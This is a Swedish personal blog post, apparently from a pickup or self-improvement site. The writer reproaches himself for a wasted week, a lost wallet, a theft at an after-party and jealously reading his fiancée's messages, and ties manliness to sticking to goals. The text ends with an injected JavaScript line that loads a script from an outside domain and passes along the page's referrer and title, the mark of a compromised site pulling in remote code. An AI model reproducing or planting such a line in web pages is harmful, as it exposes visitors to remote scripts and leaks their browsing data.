Young%20man%20looking%20in%20mirror Du är din enda fiende

Du är din enda fiende, den enda som kan stoppa dig. Det finns inget du inte kan uppnå här i livet, så länge du lär dig hantera din fiende – du själv.

Jag har chodeat. Denna bloggpost är över 24 timmar sen och det är mitt fel, hur jag än vrider och vänder på det. Jag skulle ha skrivit den i fredags men då hade jag förlorat plånboken med tio olika viktiga kort. Då sprang jag runt och oroade mig för det och ringde runt som en galning. I lördags, då bloggen skulle ha postats, så arbetade jag och stack direkt efteråt till en födelsedagsfest som jag lovat att gå till. Det är inte mitt fel.

Men jo, det är det. Det är mitt fel att jag tappade bort plånboken, hur mycket jag än känner för att skylla på otur. Det är mitt fel att jag inte kunde koppla bort mina bekymmer över det i fredags och komma ihåg att skriva min post. Det är mitt fel att jag inte kunde offra tid igår, lördag, för att skriva den.

Jag var inte i skolan i torsdags och fredags, för jag var och chodea med min fästmö. Det innebär inte att jag tycker att det är dåligt att spendera tid med henne. Det innebär att jag var med henne i en säng hela dagen och inte gjorde något nyttigt. Jag missade repning, träning och skola, slösade massa pengar, åt onyttig mat, såg förjävlig ut och tappade bort min plånbok.

Jag hade en ”segdag” och det gick så långt att jag nästan blev handikappad och sanningen är den att det är just därför jag tappade bort min plånbok, för hela dagen kände jag mig som en zombie. Och det är mitt fel.

Aja, alla problem kan supas bort. Vilket jag gjorde i lördags i samband med att jag inte skrivit bloggpost, samlat på mig massa skolarbete, tappat bort min plånbok och min fästmös bästa vän fyllde nitton. Vad ledde det till?

- Vårdslöshet.

Vi hade efterfest i Prj Göteborg/Club Vegas och blev så fulla att vi slutade bry oss. Vi bjöd in massa folk från höger till vänster och hade kul. 10 minuter efter att de flesta gått runt fem på morgonen börjar en tjej gråta då hennes stövlar för ettusenfemhundra kronor blivit stulna. Stackarn. Vi hjälper henne leta för säkerhets skull och märker snabbt att min jacka för tretusenfemhundra, Mr.Ms jacka, en mp3 spelare och massa annat blivit stulet.

Och det är mitt fel.

Jag blir deggig och deppig och sitter för mig själv medan min fästmö åker iväg för att trösta sin polare som förlorat sina stövlar. Jag får hennes telefon för att ringa runt och ta reda på vilka människorna som vart här var och då upptäcker jag massa sms i hennes telefon. Jag har hittills chodeat i flera dagar och det skapar ett mönster. Jag läser smsen och ser allt ur en ”glaset är halvtomt” inställning och börjar chodea rejält.

Jag börjar tjafsa med henne idag, Söndag, helt i onödan och sårar henne för det lilla faktum att hon har två killkompisar. I’m a chode.

I snap out of it och spenderar lite quality time med henne – med choklad och sömn, mitt på dan. Jag vaknar och halva dagen har förflutit och inte en enda sak jag planerat att göra har blivit gjort.

Jag går hem.

Jag har inte skrivit min Game-Plan för att den försvann iom. att min laptop gick sönder. Det är inte mitt fel. Fast jo. Hade jag hållt mig till tidsplanen så hade jag publicerat den innan min dator gick sönder. In my own face.

Jag har inte skrivit de skolarbeten jag låg bak i. Hey, I’ve been busy. Nope. Visst är jag upptagen men jag slösar mycket tid på ingenting och onödigt tv-tittande.

Jag har flakeat på många av mina planer.

Manlighet är målmedvetenhet. Att inte följa sina mål försvagar en mer än något annat någonsin kan göra. Det är det vi kallar för chode. Att vara försvagad. Att inte vara man. Att låta sig själv lägga käppar för hjulet är det enda som kan stoppa det hjulet. För vad som än händer mot dig, vilka hinder du än får, så finns det alltid en väg fram så länge DU hanterar din fiende – dig själv. Så länge du finner kraften att hålla dig till dina mål så kommer du finna din väg.

På samma sätt är det med kvinnor. Så länge du håller dig till målet att få denna kvinna i ditt liv så kommer du finna vägen dit. Så länge du håller dig till målet att bli bra på detta med attraktion så kommer du finna din väg.

Om jag inte gör något för att ändra på mig själv så kommer jag att förlora min examen och min familj kommer att förakta mig. Jag kommer att förlora min position på C-R, för jag kan inte vara hycklare genom att lära ut saker jag inte lever. Jag kommer att förlora mitt band. Jag kommer aldrig att komma i form med träningen. Min fästmö kommer att känna av att jag försvagats och tröttna på att jag bara är en soffpotatis som inte gör något med mitt liv – och lämna mig.

Så vad har jag gjort för att komma på rätt väg igen?

Jag har kallat mig själv för chode och utvärderat mig själv. Jag har ändrat på min fysiologi genom att raka mig, klippa mitt hår lite och platta till det. Tagit en rejäl dusch, tvättat ansiktet och smörjt in mig själv i härlig tigerbalsam. Jag skrev upp en To-do lista att följa och jag följer den.

Nästa gång jag planerar att umgås med min fästmö så ska det vara en fysisk aktivitet. Löpning, basket, promenad, whatever.

Jag ser min misslyckade vecka som en lärdom och ger mig själv löftet att lära mig av mina misstag. Som en rastafari en gång sa till mig:

”If you don’t learn from your mistakes, you will start to repeat them. Once you start repeating your mistakes, they are no longer called misstakes, but bad habits. Then, my friend, you are in real trouble”. – Rash Joe

Det är allt vi kan göra. Kriga mot oss själva och den oändliga striden mellan att vilja ha bekvämlighet och äventyr.

Antingen sitta i soffan och lata sig eller upp på benen och uppleva saker.

There’s nothing more then that.

- Xtreeme

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;